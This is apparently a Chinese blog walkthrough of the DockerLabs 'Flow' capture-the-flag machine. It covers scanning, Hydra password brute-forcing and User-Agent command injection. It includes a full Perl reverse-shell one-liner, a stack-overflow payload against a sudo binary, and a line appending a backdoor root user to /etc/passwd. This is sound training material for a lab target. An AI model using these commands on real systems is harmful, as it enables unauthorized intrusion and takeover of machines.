Pepster'Blog
DockerLabs-Flow-Walkthrough
城南花已开 Lv6
  2025-06-15 21:45:05   2025-07-01 00:26:26    2.7k 字  14 分钟  

信息收集

服务探测

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
export ip=172.17.0.2
❯ rustscan -a $ip
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog         :
: https://github.com/RustScan/RustScan :
 --------------------------------------
To scan or not to scan? That is the question.

[~] The config file is expected to be at "/home/Pepster/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 172.17.0.2:22
Open 172.17.0.2:80
[~] Starting Script(s)
[~] Starting Nmap 7.95 ( https://nmap.org ) at 2025-06-15 19:03 CST
Initiating ARP Ping Scan at 19:03
Scanning 172.17.0.2 [1 port]
Completed ARP Ping Scan at 19:03, 0.10s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 19:03
Completed Parallel DNS resolution of 1 host. at 19:03, 0.00s elapsed
DNS resolution of 1 IPs took 0.00s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 19:03
Scanning 172.17.0.2 [2 ports]
Discovered open port 80/tcp on 172.17.0.2
Discovered open port 22/tcp on 172.17.0.2
Completed SYN Stealth Scan at 19:03, 0.05s elapsed (2 total ports)
Nmap scan report for 172.17.0.2
Host is up, received arp-response (0.000076s latency).
Scanned at 2025-06-15 19:03:29 CST for 0s

PORT   STATE SERVICE REASON
22/tcp open  ssh     syn-ack ttl 64
80/tcp open  http    syn-ack ttl 64
MAC Address: 02:42:AC:11:00:02 (Unknown)

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.39 seconds
           Raw packets sent: 3 (116B) | Rcvd: 3 (116B)

目录枚举

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
❯ gobuster dir -u "http://$ip" -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,zip,txt -b 404,403
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://172.17.0.2
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes:   403,404
[+] User Agent:              gobuster/3.6
[+] Extensions:              php,html,zip,txt
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/index.php            (Status: 200) [Size: 2615]
Progress: 1102795 / 1102800 (100.00%)
===============================================================
Finished
===============================================================

只存在一个index.php

浏览器访问一下

是个登录表单

image

Hydra爆破

查看源代码,从中发现注释d1se0

image

猜测可能是用户名

尝试爆破一下,得到密码amigos

1
2
3
4
5
6
7
8
9
❯ hydra -l d1se0  -P /usr/share/wordlists/rockyou.txt $ip  http-post-form "/index.php:username=d1se0&password=^PASS^:S=302" -t 64 -I
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-06-15 21:50:44
[DATA] max 64 tasks per 1 server, overall 64 tasks, 14344399 login tries (l:1/p:14344399), ~224132 tries per task
[DATA] attacking http-post-form://172.17.0.2:80/index.php:username=d1se0&password=^PASS^:S=302
[80][http-post-form] host: 172.17.0.2   login: d1se0   password: amigos
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2025-06-15 21:50:51

登录后会跳转至/gestionAdminPanel.php

然而并没有什么交互点,单纯的欢迎页面

image

命令执行

尝试抓包看一下

发现可以控制User-Agent达到任意命令执行

image

直接弹个shell回来

发现没有nc,利用perl弹回来

1
perl -e 'use Socket;$i="192.168.60.100";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/bash -i");};'

用户提权

监听端口

发现存在flow用户

1
2
3
4
5
6
7
8
9
10
11
12
❯ penelope.py
[+] Listening for reverse shells on 0.0.0.0:4444 →  127.0.0.1 • 192.168.60.100 • 172.17.0.1
➤  🏠 Main Menu (m) 💀 Payloads (p) 🔄 Clear (Ctrl-L) 🚫 Quit (q/Ctrl-C)
[+] Got reverse shell from 740fe5d8063f-172.17.0.2-Linux-x86_64 😍️ Assigned SessionID <1>
[+] Attempting to upgrade shell to PTY...
[+] Shell upgraded successfully using /usr/bin/python3! 💪
[+] Interacting with session [1], Shell Type: PTY, Menu key: F12
[+] Logging to /home/Pepster/.penelope/740fe5d8063f~172.17.0.2_Linux_x86_64/2025_06_15-22_05_14-241.log 📜
───────────────────────────────────────────────────────────────────────────
www-data@740fe5d8063f:/var/www/html$ cat /etc/passwd |grep bin/bash
root:x:0:0:root:/root:/bin/bash
flow:x:1001:1001:flow,,,:/home/flow:/bin/bash
  • 命令执行相关代码片段

image

查找属于用户flow的文件

1
2
3
4
5
6
7
8
9
10
11
12
www-data@740fe5d8063f:/tmp/toolkit-HqUVDeDb$ find / -user flow 2>/dev/null
/usr/bin/secret
/home/flow
www-data@740fe5d8063f:/tmp/toolkit-HqUVDeDb$ file /usr/bin/secret
bash: file: command not found
www-data@740fe5d8063f:/tmp/toolkit-HqUVDeDb$ cat /usr/bin/secret
#!/bin/bash

# MQYXGZJQNFZXI2DFMJSXG5CAEQSCC===

whoami

得到一段疑似base系列编码,暂不知的是什么编码

CyberChef梭哈一下

image

拿到密码d1se0isthebest@$$!,切换用户

1
2
3
4
5
6
7
8
9
10
11
12
13
14
www-data@740fe5d8063f:/tmp/toolkit-HqUVDeDb$ su flow
Password:
flow@740fe5d8063f:/tmp/toolkit-HqUVDeDb$ cd ~
flow@740fe5d8063f:~$ ls -al
total 28
drwxr-x--- 3 flow flow 4096 Dec 22 17:06 .
drwxr-xr-x 1 root root 4096 Dec 22 16:28 ..
-rw-r--r-- 1 flow flow  220 Dec 22 16:27 .bash_logout
-rw-r--r-- 1 flow flow 3771 Dec 22 16:27 .bashrc
drwx------ 2 flow flow 4096 Dec 22 17:05 .cache
-rw-r--r-- 1 flow flow  807 Dec 22 16:27 .profile
-rw-r--r-- 1 root root   33 Dec 22 17:01 user.txt
flow@740fe5d8063f:~$ cat user.txt
8faa61e648fe0368af3336cf7f975410

Root提权

同时用户拥有sudo权限

可以执行/usr/local/bin/manager

大概率是作者自己写的程序

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
flow@740fe5d8063f:~$ sudo -l
Matching Defaults entries for flow on 740fe5d8063f:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty

User flow may run the following commands on 740fe5d8063f:
    (ALL : ALL) NOPASSWD: /usr/local/bin/manager
flow@740fe5d8063f:~$ ls -al /usr/local/bin/manager
-rwxr-xr-x 1 root root 16600 Dec 22 21:46 /usr/local/bin/manager
flow@740fe5d8063f:~$ sudo /usr/local/bin/manager
############################################################
#      Sistema de Gestión - Modo Usuario/Admin             #
############################################################

Escribe la contraseña: aaaaa

[+] Estás en modo usuario
Tu clave sera "root" para entrar al modo administrador
flow@740fe5d8063f:~$ sudo /usr/local/bin/manager
############################################################
#      Sistema de Gestión - Modo Usuario/Admin             #
############################################################

Escribe la contraseña: root

[+] Estás en modo usuario
Tu clave sera "root" para entrar al modo administrador

Stack Overflow

下载到本地,反编译下

1
2
3
4
5
flow@740fe5d8063f:~$
[!] Session detached ⇲

(Penelope)─(Session [1])> download /usr/local/bin/manager
[+] Download OK '/home/Pepster/.penelope/740fe5d8063f~172.17.0.2_Linux_x86_64/downloads/usr/local/bin/manager'

分析一下程序逻辑结构

image

典型的栈溢出漏洞

采用fgets来读取输入字节

  • 如果 v5 等于 1919905652 (这是一个特定的魔术数字):
    • 打印绿色消息 "[+] Est..." ,表示进入管理模式。
    • 调用 write_key_to_file(v5)v5 的值写入文件。
    • 调用 execute_command() 函数,允许用户执行系统命令。
  • 如果 v5 不等于 1919905652 (包括其初始值 1234):
    • 打印红色消息 "[!] Est..." ,表示未进入管理模式。
    • 调用 write_key_to_file(v5)v5 的值写入文件。
    • 调用 user_mode() 函数。

检查一下程序保护情况

发现开启了PIE基地址是随机化的,函数地址每次加载都会发生变化

1
2
3
4
5
6
7
8
9
10
❯ checksec manager
[*] '/home/Pepster/.penelope/740fe5d8063f~172.17.0.2_Linux_x86_64/downloads/usr/local/bin/manager'
    Arch:       amd64-64-little
    RELRO:      Partial RELRO
    Stack:      No canary found
    NX:         NX unknown - GNU_STACK missing
    PIE:        PIE enabled
    Stack:      Executable
    RWX:        Has RWX segments
    Stripped:   No

那先老样子,找偏移

得到覆盖RIP偏移为88

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
❯ gdb -q manager
pwndbg: loaded 188 pwndbg commands and 47 shell commands. Type pwndbg [--shell | --all] [filter] for a list.
pwndbg: created $rebase, $base, $hex2ptr, $argv, $envp, $argc, $environ, $bn_sym, $bn_var, $bn_eval, $ida GDB functions (can be used with print/break)
Reading symbols from manager...
(No debugging symbols found in manager)
------- tip of the day (disable with set show-tips off) -------
Use GDB's pi command to run an interactive Python console where you can use Pwndbg APIs like pwndbg.aglib.memory.read(addr, len), pwndbg.aglib.memory.write(addr, data), pwndbg.aglib.vmmap.get() and so on!
pwndbg> cyclic 300
aaaaaaaabaaaaaaacaaaaaaadaaaaaaaeaaaaaaafaaaaaaagaaaaaaahaaaaaaaiaaaaaaajaaaaaaakaaaaaaalaaaaaaamaaaaaaanaaaaaaaoaaaaaaapaaaaaaaqaaaaaaaraaaaaaasaaaaaaataaaaaaauaaaaaaavaaaaaaawaaaaaaaxaaaaaaayaaaaaaazaaaaaabbaaaaaabcaaaaaabdaaaaaabeaaaaaabfaaaaaabgaaaaaabhaaaaaabiaaaaaabjaaaaaabkaaaaaablaaaaaabmaaa
pwndbg> r
Starting program: /home/Pepster/.penelope/740fe5d8063f~172.17.0.2_Linux_x86_64/downloads/usr/local/bin/manager
warning: opening /proc/self/mem file failed: Permission denied (13)
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
############################################################
#      Sistema de Gestión - Modo Usuario/Admin             #
############################################################

Escribe la contraseña: aaaaaaaabaaaaaaacaaaaaaadaaaaaaaeaaaaaaafaaaaaaagaaaaaaahaaaaaaaiaaaaaaajaaaaaaakaaaaaaalaaaaaaamaaaaaaanaaaaaaaoaaaaaaapaaaaaaaqaaaaaaaraaaaaaasaaaaaaataaaaaaauaaaaaaavaaaaaaawaaaaaaaxaaaaaaayaaaaaaazaaaaaabbaaaaaabcaaaaaabdaaaaaabeaaaaaabfaaaaaabgaaaaaabhaaaaaabiaaaaaabjaaaaaabkaaaaaablaaaaaabmaaa

[+] Estás en modo usuario
Tu clave sera "root" para entrar al modo administrador

Program received signal SIGSEGV, Segmentation fault.
0x00005555555553b8 in main ()
LEGEND: STACK | HEAP | CODE | DATA | WX | RODATA
────────────────────────────────────────────────[ REGISTERS / show-flags off / show-compact-regs off ]────────────────────────────────────────────────
 RAX  0
 RBX  0x7fffffffde68 —▸ 0x7fffffffe16e ◂— '/home/Pepster/.penelope/740fe5d8063f~172.17.0.2_Linux_x86_64/downloads/usr/local/bin/manager'
 RCX  0x555555559c90 —▸ 0x7ffff7f951c8 (_IO_wfile_jumps) ◂— 0
 RDX  0
 RDI  0x7ffff7f987b0 (_IO_stdfile_1_lock) ◂— 0
 RSI  0x5555555592a0 ◂— 0x632075546d305b1b
 R8   0
 R9   0
 R10  0
 R11  0x202
 R12  0
 R13  0x7fffffffde78 —▸ 0x7fffffffe1cb ◂— 'DBUS_SESSION_BUS_ADDRESS=unix:path=/run/user/1000/bus'
 R14  0x7ffff7ffd000 (_rtld_global) —▸ 0x7ffff7ffe310 —▸ 0x555555554000 ◂— 0x10102464c457f
 R15  0x555555557dd8 (__do_global_dtors_aux_fini_array_entry) —▸ 0x555555555190 (__do_global_dtors_aux) ◂— endbr64
 RBP  0x616161616161616b ('kaaaaaaa')
 RSP  0x7fffffffdd58 ◂— 'laaaaaaamaaaaaaanaaaaaaaoaaaaaaapaaaaaa'
 RIP  0x5555555553b8 (main+253) ◂— ret
─────────────────────────────────────────────────────────[ DISASM / x86-64 / set emulate on ]─────────────────────────────────────────────────────────
 ► 0x5555555553b8 <main+253>    ret                                <0x616161616161616c>










──────────────────────────────────────────────────────────────────────[ STACK ]───────────────────────────────────────────────────────────────────────
00:0000│ rsp 0x7fffffffdd58 ◂— 'laaaaaaamaaaaaaanaaaaaaaoaaaaaaapaaaaaa'
01:0008│     0x7fffffffdd60 ◂— 'maaaaaaanaaaaaaaoaaaaaaapaaaaaa'
02:0010│     0x7fffffffdd68 ◂— 'naaaaaaaoaaaaaaapaaaaaa'
03:0018│     0x7fffffffdd70 ◂— 'oaaaaaaapaaaaaa'
04:0020│     0x7fffffffdd78 ◂— 0x61616161616170 /* 'paaaaaa' */
05:0028│     0x7fffffffdd80 —▸ 0x7fffffffde68 —▸ 0x7fffffffe16e ◂— '/home/Pepster/.penelope/740fe5d8063f~172.17.0.2_Linux_x86_64/downloads/usr/local/bin/manager'
06:0030│     0x7fffffffdd88 ◂— 0x655c32971ce65e88
07:0038│     0x7fffffffdd90 ◂— 0
────────────────────────────────────────────────────────────────────[ BACKTRACE ]─────────────────────────────────────────────────────────────────────
 ► 0   0x5555555553b8 main+253
   1 0x616161616161616c None
   2 0x616161616161616d None
   3 0x616161616161616e None
   4 0x616161616161616f None
   5 0x61616161616170 None
   6   0x7fffffffde68 None
   7 0x655c32971ce65e88 None
──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
pwndbg> cyclic -l 0x616161616161616c
Finding cyclic pattern of 8 bytes: b'laaaaaaa' (hex: 0x6c61616161616161)
Found at offset 88
pwndbg> q

尝试在靶机中覆盖输入,看看有什么变化

可以看到key_output.txt数字从之前的1234变成了1094795585

1
2
3
4
5
6
7
8
9
10
11
flow@740fe5d8063f:/tmp$ (python3 -c 'import sys; sys.stdout.buffer.write(b"A"*88 + b"BBBB")')|sudo /usr/local/bin/manager
############################################################
#      Sistema de Gestión - Modo Usuario/Admin             #
############################################################

Escribe la contraseña:
[+] Estás en modo usuario
Tu clave sera "root" para entrar al modo administrador
Segmentation fault
flow@740fe5d8063f:/tmp$ cat key_output.txt
key = 1094795585

1094795585从十进制转为十六进制,得到41414141

v5被覆盖为AAAA

image

而我们可以不用覆盖至RIP只要覆盖v5Key的值即可

经过不断的测试,发现偏移设为76,才能将v5覆盖为BBBB

1
2
3
4
5
6
7
8
9
10
flow@740fe5d8063f:/tmp$ (python3 -c 'import sys; sys.stdout.buffer.write(b"A"*76 + b"BBBB")')|sudo /usr/local/bin/manager
############################################################
#      Sistema de Gestión - Modo Usuario/Admin             #
############################################################

Escribe la contraseña:
[+] Estás en modo usuario
Tu clave sera "root" para entrar al modo administrador
flow@740fe5d8063f:/tmp$ cat key_output.txt
key = 1111638594

image

  • 76 是从 buf 的起始到 key 变量起始的偏移量
  • 88 是从 buf 的起始到 saved RIP偏移量

其实s输入缓冲区的大小从IDA Pro中也能看出来

image

按照程序逻辑v5需要等于1919905652

转为十六进制即为726f6f74

image

转为小端序,将目标整数的十六进制表示的字节反转

1
2
❯ python3 -c "from pwn import *; print(p32(0x726f6f74))"
b'toor'

尝试执行一下

显然触发了execute_command()函数

1
2
3
4
5
6
7
8
9
flow@740fe5d8063f:/tmp$ (python3 -c 'import sys; sys.stdout.buffer.write(b"A"*76 + b"toor")')|sudo /usr/local/bin/mana            ############################################################
#      Sistema de Gestión - Modo Usuario/Admin             #
############################################################

Escribe la contraseña:
[+] Estás en modo administrador

[+] Modo administrador activado.
sh: 1: U: not found

但为什么会not found

因为管道 (|) 在写入端完成所有数据写入后,会关闭管道

这意味着被管道连接的程序(manager)的 stdin 会在第一个命令(密码)处理完毕后立即关闭,后续的输入请求将收到 EOF

可以这样,将payload写到文件中,然后利用cat -读取stdin并将其发送到子 shell 的标准输出

在第二次回车的时候有回显

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
flow@740fe5d8063f:/tmp$ python3 -c 'import sys; sys.stdout.buffer.write(b"A"*76 + b"toor")' > payload.bin
flow@740fe5d8063f:/tmp$ (cat payload.bin; cat -) | sudo /usr/local/bin/manager
############################################################
#      Sistema de Gestión - Modo Usuario/Admin             #
############################################################

id
Escribe la contraseña:
[+] Estás en modo administrador

[+] Modo administrador activado.
id
uid=0(root) gid=0(root) groups=0(root)
Escribe un comando: id
cat: write error: Broken pipe

直接提权即可

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
flow@740fe5d8063f:/tmp$ (cat payload.bin; cat -) | sudo /usr/local/bin/manager
############################################################
#      Sistema de Gestión - Modo Usuario/Admin             #
############################################################


Escribe la contraseña:
[+] Estás en modo administrador

[+] Modo administrador activado.
bash

id
uid=0(root) gid=0(root) groups=0(root)
echo 'primary:zSZ7Whrr8hgwY:0:0::/root:/bin/bash' >>/etc/passwd
exit
Escribe un comando:
cat: write error: Broken pipe
flow@740fe5d8063f:/tmp$ su primary
Password:
root@740fe5d8063f:/tmp# id
uid=0(root) gid=0(root) groups=0(root)
root@740fe5d8063f:/tmp# cat /root/root.txt
c8b85b82985842d2edddb7956cfac7b8

后记

哎,我发现一个更简单的,直接输入payload,再正常输入命令就行了😅

1
2
3
4
5
6
7
8
9
10
11
12
flow@740fe5d8063f:/tmp$ sudo /usr/local/bin/manager
############################################################
#      Sistema de Gestión - Modo Usuario/Admin             #
############################################################

Escribe la contraseña: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAtoor

[+] Estás en modo administrador

[+] Modo administrador activado.
Escribe un comando: id
uid=0(root) gid=0(root) groups=0(root)
  1. 信息收集
    1. 服务探测
    2. Hydra爆破
    3. 命令执行
  2. 用户提权
  3. Root提权
    1. Stack Overflow
  • 后记
    • 总字数 651.3k
    © 2024 - 2025    城南花已开
    由 Hexo 驱动 & 主题 Keep
    本站由 提供部署服务
    1. 信息收集
      1. 服务探测
      2. Hydra爆破
      3. 命令执行
    2. 用户提权
    3. Root提权
      1. Stack Overflow
  • 后记